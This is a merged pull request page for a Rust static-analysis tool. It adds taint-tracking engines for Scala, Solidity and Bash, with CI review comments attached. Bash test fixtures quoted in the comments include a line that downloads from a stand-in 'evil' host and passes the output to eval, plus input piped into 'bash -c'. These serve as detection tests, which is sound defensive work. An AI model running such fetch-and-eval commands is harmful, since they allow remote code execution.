feat(taint): Scala/Solidity/Bash taint engines (→ 92.4%)#530

Merged: peaktwilight merged 1 commit into main from feat/taint-scala-solidity-bash on Jun 18, 2026
@peaktwilight (Collaborator) commented Jun 18, 2026

Taint engines for Scala, Solidity, Bash: load rate 92.0% → 92.4%

Adds three new `mode: taint` engines, mirroring the existing ruby/php/csharp engines on the shared `taint_engine.rs` framework. Their tree-sitter grammars were already wired (rounds 7-8); these rules were blocked solely on a missing taint engine.

| Language | Rules unblocked | Δ |
|---|---|---|
| Scala | tainted-sql-from-http-request, tainted-html-response, tainted-slick-sqli, tainted-sql-string, scalajs-eval | +5 (5/5) |
| Bash | curl-eval, hooks-path-traversal-bash, hooks-unquoted-variable-bash-taint | +3 (3/3) |
| Solidity | delegatecall-to-arbitrary-address, accessible-selfdestruct | +2 (2/3; basic-arithmetic-underflow is shape-co-blocked on a pattern-inside-only source, not language-blocked) |

All three `mode: taint (unsupported language: …)` buckets → 0.

Results (independently re-measured)

| | before | after |
|---|---|---|
| Load rate | 92.0% (1972) | 92.4% (1982) |
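
As a quick consistency check on the figures in this description, the per-language deltas should add up to the change in the loaded-rule count (1972 to 1982). A minimal sketch; the `Unblocked` type and the function names are illustrative and not taken from `registry_coverage.rs`:

```rust
/// Rules unblocked per language, as reported in the PR description.
/// Hypothetical type for illustration only.
struct Unblocked {
    language: &'static str,
    rules: u32,
}

const UNBLOCKED: [Unblocked; 3] = [
    Unblocked { language: "scala", rules: 5 },
    Unblocked { language: "bash", rules: 3 },
    Unblocked { language: "solidity", rules: 2 },
];

/// Number of rules unblocked for one language, if it is listed.
fn unblocked_for(language: &str) -> Option<u32> {
    UNBLOCKED
        .iter()
        .find(|u| u.language == language)
        .map(|u| u.rules)
}

/// Sum of newly loading rules across all three languages.
fn total_unblocked() -> u32 {
    UNBLOCKED.iter().map(|u| u.rules).sum()
}

/// Loaded-rule count after the change, given the count before it.
fn loaded_after(loaded_before: u32) -> u32 {
    loaded_before + total_unblocked()
}
```

With the reported numbers, `loaded_after(1972)` should match the "after" count of 1982.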

Verification (re-run on the branch)

  • registry_coverage → 92.4% / all three buckets gone ✓
  • both dogfood scans exit 0 · cargo test 1105 passed, 0 failed · clippy -D warnings clean · fmt --check clean · baseline + Cargo.toml untouched ✓
  • Bridge-level tests for each engine (parse_taint_rule → compiled rule.check() — the exact scanner.rs:74 per-file entrypoint, NOT analyze_tree): curl-eval/scala-SQLi/delegatecall/selfdestruct fire on real registry rule patterns; safe near-misses (literal-only concat, delegatecall-to-self, clean eval) don't. API surface confirmed identical to the ruby template.

Summary by CodeRabbit

  • New Features

    • Enabled taint analysis capabilities for Bash, Scala, and Solidity programming languages
  • Documentation

    • Updated registry parity metrics showing improved coverage rate (92.4% headline loader load)
    • Refined language-specific capability tracking and coverage reports

Wire three new language taint engines into the Semgrep taint bridge,
mirroring the Ruby/PHP/C# templates and the shared taint_engine framework.

- bash_taint: command / command-substitution flow (top-level + functions);
  curl/jq/cat sources -> eval/bash -c/sh -c sinks; realpath sanitizer.
- solidity_taint: function-parameter (address) sources -> delegatecall
  (tainted receiver) and selfdestruct/suicide (tainted arg) sinks.
- scala_taint: request-parameter sources -> SQL string-building (infix /
  interpolated) and method-name (eval/execute/append/overrideSql) sinks.
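
The two Solidity sink shapes listed above differ in which position has to be tainted: the call receiver for delegatecall, an argument for selfdestruct/suicide. A minimal sketch of that distinction, assuming simplified `Call` and `SinkShape` types that are hypothetical and not the ones in `solidity_taint.rs`:

```rust
use std::collections::HashSet;

/// Which part of a call must be tainted for a sink to fire.
/// Hypothetical type for illustration only.
#[derive(Debug, Clone, Copy, PartialEq)]
enum SinkShape {
    /// `x.delegatecall(..)` fires when the receiver `x` is tainted.
    TaintedReceiver,
    /// `selfdestruct(x)` fires when any argument is tainted.
    TaintedArg,
}

/// A simplified call site: optional receiver, method name, argument names.
struct Call<'a> {
    receiver: Option<&'a str>,
    method: &'a str,
    args: Vec<&'a str>,
}

/// Map a method name to its sink shape, if it is a sink at all.
fn sink_shape(method: &str) -> Option<SinkShape> {
    match method {
        "delegatecall" => Some(SinkShape::TaintedReceiver),
        "selfdestruct" | "suicide" => Some(SinkShape::TaintedArg),
        _ => None,
    }
}

/// True when the call is a sink and the relevant position holds a tainted name.
fn sink_fires(call: &Call, tainted: &HashSet<&str>) -> bool {
    match sink_shape(call.method) {
        Some(SinkShape::TaintedReceiver) => {
            call.receiver.map_or(false, |r| tainted.contains(r))
        }
        Some(SinkShape::TaintedArg) => call.args.iter().any(|a| tainted.contains(*a)),
        None => false,
    }
}
```

Under this model a delegatecall on an untainted receiver such as `this` does not fire even when its payload argument is tainted, which is the kind of near-miss the bridge tests are described as covering.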

Bridge (semgrep_taint.rs): thread Language through the pattern compiler;
add compile_bash_pattern (shell command -> Call matcher) and a
function-signature source compiler (-> any-parameter seed) for Solidity/
Scala; strip Solidity statement-terminating `;`. Add to_*_spec/matcher,
TaintFindingView::from_*, dispatch arms, and scala/solidity/bash/sh/shell/
sol language detection. Update registry_coverage taint_language_supported.
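
To make the bridge changes above more concrete, here is a rough sketch of a language-aware pattern compiler: a shell command compiles to a call matcher keyed on the command name, a function signature compiles to an any-parameter seed, and a trailing Solidity `;` is stripped first. The `Lang` and `Matcher` types, the `AnyParam` variant, and the string heuristics are all assumptions made for illustration; the real `compile_bash_pattern` and signature compiler in `semgrep_taint.rs` may work quite differently.

```rust
/// Languages relevant to this sketch (hypothetical subset).
#[derive(Debug, Clone, Copy, PartialEq)]
enum Lang {
    Bash,
    Solidity,
    Scala,
}

/// Simplified stand-in for the bridge's matcher type.
#[derive(Debug, Clone, PartialEq)]
enum Matcher {
    /// Match a call or shell command by name.
    Call(String),
    /// Seed taint from every parameter of the enclosing function.
    AnyParam,
}

/// Compile one pattern string into a matcher, or None if it is not expressible.
fn compile_pattern(pattern: &str, lang: Lang) -> Option<Matcher> {
    let mut text = pattern.trim();
    if lang == Lang::Solidity {
        // Drop the statement terminator so `f($X);` and `f($X)` compile alike.
        text = text.trim_end_matches(';').trim_end();
    }
    match lang {
        Lang::Bash => {
            // The first word of a shell pattern is treated as the command name.
            let cmd = text.split_whitespace().next()?;
            if cmd.starts_with('$') {
                return None; // a metavariable cannot name a concrete command
            }
            Some(Matcher::Call(cmd.to_string()))
        }
        Lang::Solidity | Lang::Scala => {
            if text.starts_with("function ") || text.starts_with("def ") {
                return Some(Matcher::AnyParam);
            }
            // Otherwise take the callee name: text before `(`, after the last `.`.
            let callee = text.split('(').next()?.trim();
            let name = callee.rsplit('.').next()?;
            if name.is_empty() || name.starts_with('$') {
                None
            } else {
                Some(Matcher::Call(name.to_string()))
            }
        }
    }
}
```

Returning `None` for patterns that yield no usable name mirrors the idea that some rule shapes stay blocked because no matcher can be expressed for them.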

Each engine has unit tests plus BRIDGE-LEVEL tests (parse_taint_rule ->
Compiled -> check on a real vulnerable fixture fires; a safe near-miss does
not), using the actual registry rule YAML shapes.

Registry coverage: 92.0% (1972) -> 92.4% (1982). Unblocks all 5 scala and
3 bash taint rules and 2 of 3 solidity (delegatecall, selfdestruct). The
remaining basic-arithmetic-underflow is co-blocked: its source is a
pattern-inside-only block that yields no expressible matcher.
@peaktwilight peaktwilight merged commit 38ed1f2 into main Jun 18, 2026
17 checks passed
@peaktwilight peaktwilight deleted the feat/taint-scala-solidity-bash branch June 18, 2026 16:22
coderabbitai Bot commented Jun 18, 2026

Caution

Review failed

The pull request is closed.

ℹ️ Recent review info
⚙️ Run configuration

Configuration used: defaults

Review profile: CHILL

Plan: Pro Plus

Run ID: ac94ad52-9647-4951-87d1-21af8c4737a9

📥 Commits

Reviewing files that changed from the base of the PR and between 9f91a79 and 3ba4377.

📒 Files selected for processing (7)
  • docs/parity/registry-coverage.md
  • src/bin/registry_coverage.rs
  • src/rules/bash_taint.rs
  • src/rules/mod.rs
  • src/rules/scala_taint.rs
  • src/rules/semgrep_taint.rs
  • src/rules/solidity_taint.rs

📝 Walkthrough

Three new intraprocedural, flow-insensitive taint analysis engines are added for Bash, Solidity, and Scala. Each engine is registered as a public module, integrated into the Semgrep YAML taint bridge (semgrep_taint.rs) via language detection, per-language pattern compilation, spec conversion, and dispatch. The registry coverage classifier whitelist and the parity coverage document are updated to reflect the newly supported languages.
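
For readers unfamiliar with the term, "flow-insensitive" means the analysis ignores statement order inside a function: it keeps adding tainted variables until nothing changes, then checks every sink call against the final set. The sketch below illustrates that idea on a toy statement list. The `Stmt` and `Spec` types and the `analyze` function are hypothetical stand-ins, not the `analyze_tree` API or the shared `taint_engine.rs` types.

```rust
use std::collections::HashSet;

/// Toy statement forms; hypothetical, not foxguard's AST.
#[derive(Debug, Clone)]
enum Stmt {
    /// `target = callee(uses...)`, or a plain expression when `callee` is None.
    Assign { target: String, callee: Option<String>, uses: Vec<String> },
    /// `callee(uses...)` evaluated for its effect, at a given line.
    Call { callee: String, uses: Vec<String>, line: usize },
}

/// Source, sink, and sanitizer names for one rule (illustrative shape).
struct Spec {
    sources: HashSet<String>,
    sinks: HashSet<String>,
    sanitizers: HashSet<String>,
}

/// Build an owned name set from string literals.
fn names(list: &[&str]) -> HashSet<String> {
    list.iter().map(|s| s.to_string()).collect()
}

/// Return the lines of sink calls that receive a tainted variable.
fn analyze(body: &[Stmt], params: &[&str], spec: &Spec) -> Vec<usize> {
    // Parameter seeding: every listed parameter starts out tainted.
    let mut tainted = names(params);
    // Flow-insensitive fixed point: rescan all assignments, in any order,
    // until no new variable becomes tainted.
    loop {
        let mut changed = false;
        for stmt in body {
            if let Stmt::Assign { target, callee, uses } = stmt {
                let from_source = callee.as_ref().map_or(false, |c| spec.sources.contains(c));
                let sanitized = callee.as_ref().map_or(false, |c| spec.sanitizers.contains(c));
                let carries = uses.iter().any(|u| tainted.contains(u));
                if (from_source || (carries && !sanitized)) && tainted.insert(target.clone()) {
                    changed = true;
                }
            }
        }
        if !changed {
            break;
        }
    }
    // Report every sink call that uses a tainted variable.
    body.iter()
        .filter_map(|stmt| match stmt {
            Stmt::Call { callee, uses, line }
                if spec.sinks.contains(callee) && uses.iter().any(|u| tainted.contains(u)) =>
            {
                Some(*line)
            }
            _ => None,
        })
        .collect()
}
```

One consequence of ignoring order is over-approximation: a sink that appears before the tainting assignment is still reported, and a variable that was tainted once stays tainted even if it is later reassigned a clean value.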

Changes

Bash / Solidity / Scala Taint Engine Addition

| Layer / File(s) | Summary |
|---|---|
| **New taint engines: Bash, Solidity, Scala**<br>`src/rules/mod.rs`, `src/rules/bash_taint.rs`, `src/rules/solidity_taint.rs`, `src/rules/scala_taint.rs` | Three new files each export `analyze_tree` implementing per-function, flow-insensitive taint propagation with parameter seeding, assignment/declaration handling, sink/sanitizer matching, and comprehensive unit tests. All three are registered as public modules in `mod.rs`. |
| **Semgrep YAML bridge: language detection, pattern compiler, dispatch**<br>`src/rules/semgrep_taint.rs` | `parse_taint_rule` recognizes bash/sh/shell, solidity/sol, and scala; `compile_pattern` gains a `lang` parameter enabling language-specific `GenericMatcher` compilation (Bash command patterns → `Call`, Solidity/Scala function signatures → `ParamName`); `GenericSpec`→engine `TaintSpec` conversion functions and `TaintFindingView` constructors are added; `check_with_context` routes the three new languages to their `analyze_tree` implementations. Bridge-level end-to-end tests are included. |
| **Coverage classifier whitelist and parity docs**<br>`src/bin/registry_coverage.rs`, `docs/parity/registry-coverage.md` | `taint_language_supported` in `registry_coverage.rs` is extended to accept bash/sh/shell/solidity/sol/scala. The parity coverage document is regenerated showing the updated load rate (92.4%), skip counts, and per-language breakdown. |
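
The alias handling described in the summary can be pictured as a small lookup from the language strings a rule may declare to the engine that handles them. This is only a sketch covering the aliases added in this PR; the function names are hypothetical, exact-match comparison is an assumption, and the real `taint_language_supported` presumably also accepts the previously supported languages.

```rust
/// Map a rule's declared language string to one of the three new engines.
/// Hypothetical helper; covers only the aliases introduced in this PR.
fn new_engine_for(lang: &str) -> Option<&'static str> {
    match lang {
        "bash" | "sh" | "shell" => Some("bash"),
        "solidity" | "sol" => Some("solidity"),
        "scala" => Some("scala"),
        _ => None,
    }
}

/// True when the language string is one of the newly accepted aliases.
fn newly_supported(lang: &str) -> bool {
    new_engine_for(lang).is_some()
}
```

Keeping the alias table in one place means the loader and the coverage classifier cannot disagree about which spellings count as supported, though whether the project shares such a table is not stated here.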

Sequence Diagram(s)

sequenceDiagram
  rect rgba(173, 216, 230, 0.5)
    Note over parse_taint_rule,compile_pattern: YAML Rule Parsing
    participant parse_taint_rule
    participant compile_matcher_list
    participant compile_pattern
    parse_taint_rule->>compile_matcher_list: pattern-sources/sinks/sanitizers + lang
    compile_matcher_list->>compile_pattern: pattern text, role, lang
    compile_pattern-->>compile_matcher_list: GenericMatcher::Call or ParamName
    compile_matcher_list-->>parse_taint_rule: GenericSpec
  end
  rect rgba(144, 238, 144, 0.5)
    Note over check_with_context,scala_taint: Runtime Dispatch
    participant check_with_context
    participant bash_taint
    participant solidity_taint
    participant scala_taint
    check_with_context->>bash_taint: GenericSpec→TaintSpec, analyze_tree (Bash AST)
    bash_taint-->>check_with_context: Vec<TaintFinding>
    check_with_context->>solidity_taint: GenericSpec→TaintSpec, analyze_tree (Solidity AST)
    solidity_taint-->>check_with_context: Vec<TaintFinding>
    check_with_context->>scala_taint: GenericSpec→TaintSpec, analyze_tree (Scala AST)
    scala_taint-->>check_with_context: Vec<TaintFinding>
  end
Estimated code review effort

🎯 5 (Critical) | ⏱️ ~120 minutes

Possibly related PRs

  • 0sec-labs/foxguard#492: Extends the same semgrep_taint.rs dispatch and TaintSpec conversion path for a different language (Java), using the identical pattern of per-language check_with_context routing.
  • 0sec-labs/foxguard#506: Modifies compile_entry/compile_patterns_block in semgrep_taint.rs and the taint_language_supported classifier in registry_coverage.rs, the same functions this PR refactors to thread lang through pattern compilation.
  • 0sec-labs/foxguard#514: Adds PHP taint support via the same three-file pattern (*_taint.rs engine, mod.rs registration, semgrep_taint.rs bridge dispatch, registry_coverage.rs whitelist) used in this PR.

Poem

🐇 Hippity-hop through the AST trees,
Bash, Solidity, Scala — taint flows with ease!
Commands and delegates, sinks in a row,
Parameters seeded wherever we go.
The coverage climbs to ninety-two-four,
Three languages tamed — who could ask for more? 🎉

Comment thread src/rules/bash_taint.rs
}

fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> {
let tree = parse_file(src, Language::Bash).expect("parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match
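
One way to act on this finding in a helper like `run` is to return a `Result` and propagate the parse failure with `?`; Rust test functions may themselves return `Result`, so the caller does not need `.expect()` either. The sketch below uses a stand-in `parse_fixture` and `ParseError` that are hypothetical and unrelated to foxguard's real `parse_file` signature or error type.

```rust
use std::fmt;

/// Stand-in parse error; hypothetical, not foxguard's error type.
#[derive(Debug)]
struct ParseError(String);

impl fmt::Display for ParseError {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        write!(f, "parse error: {}", self.0)
    }
}

impl std::error::Error for ParseError {}

/// Stand-in parser: fails on blank input, otherwise splits into tokens.
fn parse_fixture(src: &str) -> Result<Vec<String>, ParseError> {
    if src.trim().is_empty() {
        return Err(ParseError("empty fixture".to_string()));
    }
    Ok(src.split_whitespace().map(str::to_string).collect())
}

/// Helper that propagates the parse failure with `?` instead of panicking.
fn run(src: &str) -> Result<usize, ParseError> {
    let tokens = parse_fixture(src)?;
    Ok(tokens.len())
}

#[cfg(test)]
mod tests {
    use super::*;

    /// A test can return `Result`, so `?` replaces `.expect()` here too.
    #[test]
    fn eval_fixture_parses() -> Result<(), ParseError> {
        let count = run("eval \"$out\"")?;
        assert_eq!(count, 2);
        Ok(())
    }
}
```

A failing parse then surfaces as a test failure carrying the error value rather than as a panic inside the helper.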

Comment thread src/rules/scala_taint.rs
use crate::Language;

fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> {
let tree = parse_file(src, Language::Scala).expect("parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

assert_eq!(rule.lang, Language::Bash);

let src = "out=$(curl http://evil)\neval \"$out\"\n";
let tree = parse_file(src, Language::Bash).expect("bash fixture should parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

);

let src = "out=\"ls -la\"\neval \"$out\"\n";
let tree = parse_file(src, Language::Bash).expect("bash fixture should parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

);

let src = "data=$(cat | jq -r '.path')\nbash -c \"$data\"\n";
let tree = parse_file(src, Language::Bash).expect("bash fixture should parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Scala).expect("scala fixture should parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Scala).expect("scala fixture should parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Scala).expect("scala fixture should parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

use crate::Language;

fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> {
let tree = parse_file(src, Language::Solidity).expect("parse");

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match
